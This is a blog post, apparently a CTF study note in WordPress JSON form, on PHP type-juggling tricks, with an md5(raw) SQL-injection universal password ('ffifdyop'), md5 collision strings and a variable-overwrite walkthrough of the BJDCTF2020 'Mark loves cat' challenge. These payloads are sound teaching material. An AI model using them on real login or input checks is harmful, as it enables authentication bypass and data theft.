{"id":218,"date":"2021-07-05T06:54:32","date_gmt":"2021-07-04T22:54:32","guid":{"rendered":"http:\/\/101.34.19.194\/?p=218"},"modified":"2021-08-03T19:39:33","modified_gmt":"2021-08-03T11:39:33","slug":"php%e7%89%b9%e6%80%a7","status":"publish","type":"post","link":"http:\/\/101.34.19.194\/?p=218","title":{"rendered":"PHP features"},"content":{"rendered":"\n<h2 class=\"wp-block-heading\">PHP intval() function<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\">Basics<\/h3>\n\n\n\n<p><strong>intval()<\/strong> returns the integer value of a variable.<\/p>\n\n\n\n<p><strong>intval()<\/strong> converts the variable var to an integer using the given base (decimal by default). intval() cannot be used on objects; doing so raises an E_NOTICE and returns <strong>1<\/strong>.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">int intval ( mixed $var [, int $base = 10 ] )<\/pre>\n\n\n\n<p>Parameters:<\/p>\n\n\n\n<ul><li>$var: the value to convert to an integer.<\/li><li>$base: the base to use for the conversion.<\/li><\/ul>\n\n\n\n<p>If base is 0, the base is chosen by inspecting the format of var:<\/p>\n\n\n\n<ul><li>if the string has a \"0x\" (or \"0X\") prefix, base 16 (hex) is used; otherwise,<\/li><li>if the string starts with \"0\", base 8 (octal) is used; otherwise,<\/li><li>base 10 (decimal) is used.<\/li><\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">Detecting whether intval() is in use<\/h3>\n\n\n\n<p>Try these payloads:<\/p>\n\n\n\n<blockquote class=\"wp-block-quote\"><p>news.php?id=13<\/p><p>news.php?id=1<\/p><p>news.php?id[]=13<\/p><\/blockquote>\n\n\n\n<p>Suppose the backend PHP does $id=intval($_GET['id']);<\/p>\n\n\n\n<p>Then these two payloads produce the same response:<\/p>\n\n\n\n<blockquote class=\"wp-block-quote\"><p>news.php?id=1<\/p><p>news.php?id[]=13<\/p><\/blockquote>\n\n\n\n<p>because of the property of intval(): <code>intval() cannot be used on objects; otherwise it raises an E_NOTICE and returns 1<\/code><\/p>\n\n\n\n<p>If instead these two payloads produce the same response:<\/p>\n\n\n\n<blockquote class=\"wp-block-quote\"><p>news.php?id=13<\/p><p>news.php?id[]=13<\/p><\/blockquote>\n\n\n\n<p>then the backend is not using intval().<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Type conversion<\/h3>\n\n\n\n<p>intval() converts a string to an int (it truncates to an integer).<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">var_dump(intval(4));        \/\/ 4<br><br>var_dump(intval('1asd'));   \/\/ 1<br><br>var_dump(intval('asd1'));   \/\/ 0<\/pre>\n\n\n\n<p>These three examples show that when intval() converts a string it does not raise an error on a string it cannot convert; it returns 0 instead.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Bypass examples<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">intval('4476.0')===4476     decimal point<br>intval('+4476.0')===4476    sign<br>intval('4476e0')===4476     scientific notation<br>intval('0x117c')===4476     hexadecimal<br>intval('010574')===4476     octal<br>intval(' 010574')===4476    octal + leading space<br>intval('+010574')===4476    plus sign + octal<br><br>\/\/ the 0x and leading-0 rows only hold when the base argument is 0, i.e. intval($num, 0);<br>\/\/ with the default base 10 they return 0 and 10574 respectively<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">PHP comparison operators<\/h2>\n\n\n\n<p>\"==\": converts both operands to the same type, then compares.<\/p>\n\n\n\n<p>\"===\": first checks whether both operands have the same type, then compares.<\/p>\n\n\n\n<p>In short, \"===\" compares both the value and the type of two variables; \"==\" compares only the value, not the data type.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">$a = '123';<br>$b = 123;<br>$a === $b is false;<br>$a == $b is true;<\/pre>\n\n\n\n<h4 class=\"wp-block-heading\">Strings and integers<\/h4>\n\n\n\n<p>To be explicit: under the two-equals comparison, when a string is compared with a number, the string is converted to a number.<\/p>\n\n\n\n<p>For example<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;?php<br> var_dump(\"name\"==0);   \/\/true<br> var_dump(\"1name\"==1);  \/\/true<br> var_dump(\"name1\"==1);  \/\/false<br> var_dump(\"name1\"==0);  \/\/true<br> var_dump(\"0e123456\"==\"0e4456789\"); \/\/true<br> ?&gt;<\/pre>\n\n\n\n<p>The results above are PHP 7 behaviour. PHP 8 changed number-to-string comparison: a number compared with a non-numeric string is first cast to a string, so \"name\"==0, \"1name\"==1 and \"name1\"==0 are all false in PHP 8, while \"0e123456\"==\"0e4456789\" stays true because both sides are numeric strings.<\/p>\n\n\n\n<p>When a string is evaluated as a number, the result and type are as follows: if the string does not contain <strong>'.', 'e', 'E'<\/strong> and its numeric value fits in the integer range, it is evaluated as an int; in all other cases it is evaluated as a float. The <strong>leading part<\/strong> of the string determines <strong>its value<\/strong>: if the string starts with valid numeric data, that value is used; otherwise the value is 0.<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">Scientific notation<\/h4>\n\n\n\n<pre class=\"wp-block-preformatted\">\"0e132456789\"==\"0e7124511451155\" \/\/true<br>\"0e1abc\"==\"0\"     \/\/false: \"0e1abc\" is not a numeric string, and two strings are compared numerically only when both are numeric<\/pre>\n\n\n\n<p>A pattern of the form xex denotes scientific notation, e.g. 1e3 = 1*10^3. During a comparison, a string matching 0e\\d+ (that is, a literal 0e followed entirely by digits) is parsed as scientific notation, so whatever follows the 0e, zero to any power is still zero.<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">md5<\/h4>\n\n\n\n<h5 class=\"wp-block-heading\">Weak comparison<\/h5>\n\n\n\n<pre class=\"wp-block-preformatted\">if (isset($_POST['a']) and isset($_POST['b'])) {<br>    if ($_POST['a'] != $_POST['b'])<br>        if (md5($_POST['a']) === md5($_POST['b']))<br>            echo $flag;<br>        else<br>            print 'Wrong.';<br>}<\/pre>\n\n\n\n<p>In PHP, md5() only handles string values.<\/p>\n\n\n\n<p><code>md5(string,raw)<\/code>: string is the input string; raw is optional and sets the output format: TRUE gives the raw 16-byte binary digest, FALSE (the default) gives a 32-character hexadecimal string.<\/p>\n\n\n\n<p>If given an array it returns NULL (PHP 7; in PHP 8 md5() on an array throws a TypeError instead), so two arrays passed through md5() compare equal even under strict comparison.<\/p>\n\n\n\n<p><code>a[]=1&amp;b[]=2<\/code> sent via POST<\/p>\n\n\n\n<h5 class=\"wp-block-heading\">Weak comparison (md5 type juggling)<\/h5>\n\n\n\n<pre class=\"wp-block-preformatted\">$a=(string)$a;<br>$b=(string)$b;<br>if(  ($a!==$b) &amp;&amp; (md5($a)==md5($b)) ){<br>    echo $flag;<br>}<\/pre>\n\n\n\n<p>Bypass:<\/p>\n\n\n\n<p>It is enough to supply a number and a string whose MD5 digests both start with 0e followed only by digits; the two hashes then compare equal.<\/p>\n\n\n\n<p><code>a=240610708&amp;b=QNKCDZO<\/code><\/p>\n\n\n\n<h5 class=\"wp-block-heading\">Strict comparison<\/h5>\n\n\n\n<pre class=\"wp-block-preformatted\">$a=(string)$a;<br>$b=(string)$b;<br>if(  ($a!==$b) &amp;&amp; (md5($a)===md5($b)) ){<br>    echo $flag;<br>}<\/pre>\n\n\n\n<pre class=\"wp-block-preformatted\">a=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2&amp;b=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2<\/pre>\n\n\n\n<p>These two long encoded strings have the same md5 value. They are produced by converting a hex string to its raw byte (ASCII) form and writing it to a binary file; since some of those bytes are non-printable, they are URL-encoded so they can be sent to the server.<\/p>\n\n\n\n<h5 class=\"wp-block-heading\">SQL injection bypass<\/h5>\n\n\n\n<p>The weak point is md5($pass,true). First, a look at how the md5 function is used:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img src=\"https:\/\/gitee.com\/hermitaria\/blogimagee\/raw\/master\/20210725104239.png\" alt=\"img\"\/><\/figure>\n\n\n\n<p>Here the raw parameter is True, meaning the raw 16-byte binary digest is returned.<\/p>\n\n\n\n<p>That means if the md5 digest, converted from hex to a string, has the form 'or'+something, then after concatenation the SQL statement becomes:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">select * from `admin` where password=''or'balabala'<\/pre>\n\n\n\n<p>When the value after 'or' evaluates to True, this forms a universal password and the SQL injection succeeds. The MySQL behaviour we need to know here is:<\/p>\n\n\n\n<blockquote class=\"wp-block-quote\"><p>In MySQL, when used in a boolean context, a string starting with 1 is treated as an integer.<\/p><p>Note that this requires the string to be wrapped in single quotes: for example password='xxx' or '1xxxxxxxxx' is equivalent to password='xxx' or 1, which is equivalent to password='xxx' or true, so the result is true.<\/p><p>In later testing I found that it does not have to start with 1; any leading digit works. Of course, if it is only digits, no single quotes are needed: password='xxx' or 1 also returns true. (xxx stands for arbitrary characters.)<\/p><\/blockquote>\n\n\n\n<pre class=\"wp-block-preformatted\">select * from `admin` where password=''or'1abcdefg'    ---&gt;  True<br>select * from `admin` where password=''or'0abcdefg'    ---&gt;  False<br>select * from `admin` where password=''or'1'           ---&gt;  True<br>select * from `admin` where password=''or'2'           ---&gt;  True<br>select * from `admin` where password=''or'0'           ---&gt;  False<\/pre>\n\n\n\n<p><strong>As long as the string after 'or' starts with a non-zero digit, the condition is True<\/strong>; that is our breakthrough point.<\/p>\n\n\n\n<p>This script finds plaintexts that satisfy the requirement:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;?php<br>for ($i = 0;;) {<br>    for ($c = 0; $c &lt; 1000000; $c++, $i++)<br>        if (stripos(md5($i, true), '\\'or\\'') !== false)<br>            echo \"\\nmd5($i) = \" . md5($i, true) . \"\\n\";<br>    echo \".\";<br>}<br>?&gt;<br><br>\/\/ taken from http:\/\/mslc.ctf.su\/wp\/leet-more-2010-oh-those-admins-writeup\/<\/pre>\n\n\n\n<p>The most commonly used one: <strong>ffifdyop<\/strong>. With raw set to True, its md5 digest begins with <strong>'or'6&lt;trash&gt;<\/strong> (&lt;trash&gt; is just garbage and non-printable bytes; as long as the first character after the quote is a non-zero digit the condition is judged True, and the rest of the &lt;trash&gt; is discarded when MySQL converts the string to an integer for the comparison).<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">Hexadecimal conversion<\/h4>\n\n\n\n<pre class=\"wp-block-preformatted\">\"0x1e240\"==\"123456\" \/\/true<br>\"0x1e240\"==123456 \/\/true<br>\"0x1e240\"==\"1e240\"\/\/false<\/pre>\n\n\n\n<p>When PHP receives a string with a 0x prefix, it parses it as decimal before comparing: 0x1e240 parsed as decimal is 123456, which equals both the string \"123456\" and the int 123456. (This is PHP 5 behaviour; since PHP 7.0 hexadecimal strings are no longer treated as numeric, so all three comparisons above are false.)<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">Boolean conversion<\/h4>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;?php<br>if (true == \"name\") {<br>    echo \"success\";<br>}<\/pre>\n\n\n\n<p>A boolean compares equal to any string (under ==, the other operand is converted to a boolean, so any non-empty string other than \"0\" is true).<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">PHP regular expressions<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\">Regex modifiers<\/h3>\n\n\n\n<figure class=\"wp-block-table\"><table><thead><tr><th>Modifier<\/th><th>Description<\/th><\/tr><\/thead><tbody><tr><td>i<\/td><td>Case-insensitive matching.<\/td><\/tr><tr><td>m<\/td><td>Treat the string as multiple lines. By default, \"^\" and \"$\" treat the subject string as a single \"line\" (even if it contains newlines). With \"m\", \"^\" and \"$\" match at the start and end of each line of the string.<\/td><\/tr><tr><td>s<\/td><td>With this modifier the subject string is treated as a single line, including newlines; newline characters are treated as ordinary characters.<\/td><\/tr><tr><td>x<\/td><td>Whitespace in the pattern is ignored unless escaped.<\/td><\/tr><tr><td>e<\/td><td>Only used with preg_replace(). <strong>After the normal substitution of backreferences in the replacement string, the replacement string is evaluated as PHP code and its result is used as the replacement.<\/strong><\/td><\/tr><tr><td>A<\/td><td>With this modifier the pattern must match at the start of the subject string. For example \"\/a\/A\" matches \"abcd\".<\/td><\/tr><tr><td>D<\/td><td>\"$\" in the pattern matches only at the very end of the subject. Without it, \"$\" also matches before a final newline. Ignored if the m modifier is set.<\/td><\/tr><tr><td>E<\/td><td>The opposite of \"m\": with this modifier \"$\" matches the absolute end of the string rather than before a newline. This mode is on by default.<\/td><\/tr><tr><td>U<\/td><td>Greedy mode, roughly the same effect as the question mark; matching as much as possible is greedy mode.<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p>Greedy mode<\/p>\n\n\n\n<p>Suppose we want to match a string that starts with the letter \"a\" and ends with the letter \"b\", but the string to be matched has many \"b\"s after the \"a\", e.g. \"a bbbbbbbbbbbbbbbbb\". In greedy mode the match extends to the last \"b\"; otherwise it stops at the first \"b\".<\/p>\n\n\n\n<p>Examples of PHP regular expressions using greedy mode:<\/p>\n\n\n\n<ol><li>\/a.+?b\/<\/li><li>\/a.+b\/U<\/li><\/ol>\n\n\n\n<p>For comparison, an example without greedy mode:<\/p>\n\n\n\n<ol><li>\/a.+b\/<\/li><\/ol>\n\n\n\n<h2 class=\"wp-block-heading\">Bypassing the array functions<\/h2>\n\n\n\n<p>array_search() searches an array for a value and returns the corresponding key. in_array() checks whether a given value exists in an array. Their basic behaviour is the same, so the bypass techniques are the same. The array functions have two kinds of security issue: the ordinary array bypass, and the \"==\" problem.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">in_array<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">$allow = array(1,'2','3');<br>var_dump(in_array('1.php',$allow));<br>\/\/ returns true<br><br>$allow = array('1','2','3');<br>var_dump(in_array('1.php',$allow));<br>\/\/ returns false<\/pre>\n\n\n\n<p>This is the loose-comparison behaviour of <code>in_array()<\/code>: <code>'1.php'==1<\/code>.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">$array=[0,1,2,'3'];<br>var_dump(in_array('abc', $array));  \/\/true \"abc\"==0<br>var_dump(in_array('1bc', $array));  \/\/true \"1bc\"==1<\/pre>\n\n\n\n<p>Again this is PHP 7 behaviour; in PHP 8 both loose comparisons are false, and passing strict=true as the third argument of in_array() avoids the problem in any version.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">array_search<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;?php<br>if(!is_array($_GET['test'])){exit();}<br>$test=$_GET['test'];<br>for($i=0;$i&lt;count($test);$i++){<br>    if($test[$i]===\"admin\"){<br>        echo \"error\";<br>        exit();<br>    }<br>    $test[$i]=intval($test[$i]);<br>}<br>if(array_search(\"admin\",$test)===0){<br>    echo \"flag\";<br>}<br>else{<br>    echo \"false\";<br>}<br>?&gt;<\/pre>\n\n\n\n<blockquote class=\"wp-block-quote\"><p>This code first checks that the input is an array, then iterates over its contents: no element may be identical to admin (the type must match too); each element is then converted to int, and finally, if the searched value matches admin, the flag is returned.<\/p><\/blockquote>\n\n\n\n<p>The basic idea is unchanged. Because triple equals is used, the \"==\" approach is essentially unusable, so we use the second idea: exploit the fact that when the function is given a non-matching type it returns \"0\", and bypass the check directly. So the payload is test[]=0.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">ReflectionClass<\/h2>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;?php<br>class A{<br>    public static $flag=\"flag{123123123}\";<br>    const PI=3.14;<br>    static function hello(){<br>        echo \"hello&lt;\/br&gt;\";<br>    }<br>}<br>$a=new ReflectionClass('A');<br><br>var_dump($a-&gt;getConstants());   \/\/ get the constants<br>\/\/ output:<br>array(1) {<br>  [\"PI\"]=&gt;<br>  float(3.14)<br>}<br><br>var_dump($a-&gt;getName());        \/\/ get the class name<br>\/\/ output:<br>string(1) \"A\"<br><br>var_dump($a-&gt;getStaticProperties()); \/\/ get the static properties<br>\/\/ output:<br>array(1) {<br>  [\"flag\"]=&gt;<br>  string(15) \"flag{123123123}\"<br>}<br><br>var_dump($a-&gt;getMethods());     \/\/ get the class's methods<br>\/\/ output:<br>array(1) {<br>  [0]=&gt;<br>  object(ReflectionMethod)#2 (2) {<br>    [\"name\"]=&gt;<br>    string(5) \"hello\"<br>    [\"class\"]=&gt;<br>    string(1) \"A\"<br>  }<br>}<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">PHP variable overwriting ($$)<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>Introduction to $$<\/strong><\/h3>\n\n\n\n<p>The $$ syntax is called a variable variable: a variable variable takes the value of an ordinary variable and uses it as its own variable name.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php<br>$a = \"hello\";<br>echo \"$a\"; \/\/ prints hello<br>$a = \"world\";<br>echo \"$$a\"; \/\/ prints $world<br>?&gt;<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>How the vulnerability arises<\/strong><\/h3>\n\n\n\n<p>A foreach loop iterates over an array, and each array key is used as a variable name with the corresponding array value as its value. This is what produces a variable-overwrite vulnerability.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php<br>$a = \"hello\";<br>foreach ($_GET as $key =&gt; $value) {<br>    ${$key} = $value;<br>}<br>echo $a; \/\/ the output depends on the GET parameters: they overwrite $a<br>?&gt;<\/code><\/pre>\n\n\n\n<p>$key and $value come from GET. The key line is ${$key} = $value: it creates a new variable named after the $key passed via GET and assigns it the $value passed via GET. With GET <code>?a=1<\/code> that line is evaluated as $a=1, overwriting the variable, so the final output is 1.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Worked example<\/h3>\n\n\n\n<p><code>[BJDCTF2020]Mark loves cat<\/code><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php<br><br>include 'flag.php';<br><br>$yds = \"dog\";<br>$is = \"cat\";<br>$handsome = 'yds';<br><br>foreach($_POST as $x =&gt; $y){<br>    $$x = $y;<br>}<br><br>foreach($_GET as $x =&gt; $y){<br>    $$x = $$y;<br>}<br><br>foreach($_GET as $x =&gt; $y){<br>    if($_GET['flag'] === $x &amp;&amp; $x !== 'flag'){<br>        exit($handsome);<br>    }<br>}<br><br>if(!isset($_GET['flag']) &amp;&amp; !isset($_POST['flag'])){<br>    exit($yds);<br>}<br><br>if($_POST['flag'] === 'flag'  || $_GET['flag'] === 'flag'){<br>    exit($is);<br>}<br><br>echo $flag;<\/code><\/pre>\n\n\n\n<p>1. The first two <code>foreach<\/code> loops overwrite variables from the <code>POST<\/code> and <code>GET<\/code> parameters respectively; then come three if statements, where <code>exit()<\/code> prints its argument as it terminates the script; the last statement prints the flag we want.<\/p>\n\n\n\n<p>2. The first thought is to let the script run to the final <code>echo $flag;<\/code>, but even if we get past the three if statements, the flag we pass via <code>GET<\/code> or <code>POST<\/code> is always overwritten: if we send flag=aaa via <code>GET<\/code>, the second foreach turns it into <code>$flag<\/code> = <code>$aaa<\/code>, and since <code>$aaa<\/code> is undefined it is empty, so the final output is empty. Likewise, sending flag=aaa via <code>POST<\/code> makes the first foreach do <code>$flag<\/code> = aaa, so flag is overwritten with aaa and the output is aaa.<\/p>\n\n\n\n<p>3. Although <code>exit()<\/code> in the if statements stops execution, it also prints its argument, so we can use variable overwriting to replace the argument inside <code>exit()<\/code> with <code>$flag<\/code> and have the flag printed.<\/p>\n\n\n\n<p>Method 1:<\/p>\n\n\n\n<p>Use <code>$yds<\/code> for output.<\/p>\n\n\n\n<p>The second if statement only requires that no flag parameter exists in either GET or POST.<\/p>\n\n\n\n<p>So pass <code>?yds=flag<\/code> via GET; the second foreach turns this into <code>$yds=$flag<\/code>, completing the overwrite, and printing <code>$yds<\/code> prints <code>$flag<\/code>.<\/p>\n\n\n\n<p>Method 2:<\/p>\n\n\n\n<p>Use <code>$is<\/code> for output.<\/p>\n\n\n\n<p>Pass <code>?is=flag&amp;flag=flag<\/code> via GET; the first part achieves the <code>$is<\/code>=<code>$flag<\/code> overwrite, the second part only serves to satisfy the if statement.<\/p>\n\n\n\n<p>This cannot be done via POST: if we POST <code>flag=flag<\/code>, it becomes <code>$flag=flag<\/code> and the original flag value is overwritten.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>PHP intval() function Basics intval() returns the integer value of a variable. intval() [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[3],"tags":[16],"_links":{"self":[{"href":"http:\/\/101.34.19.194\/index.php?rest_route=\/wp\/v2\/posts\/218"}],"collection":[{"href":"http:\/\/101.34.19.194\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/101.34.19.194\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/101.34.19.194\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/101.34.19.194\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=218"}],"version-history":[{"count":5,"href":"http:\/\/101.34.19.194\/index.php?rest_route=\/wp\/v2\/posts\/218\/revisions"}],"predecessor-version":[{"id":257,"href":"http:\/\/101.34.19.194\/index.php?rest_route=\/wp\/v2\/posts\/218\/revisions\/257"}],"wp:attachment":[{"href":"http:\/\/101.34.19.194\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=218"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/101.34.19.194\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=218"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/101.34.19.194\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=218"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}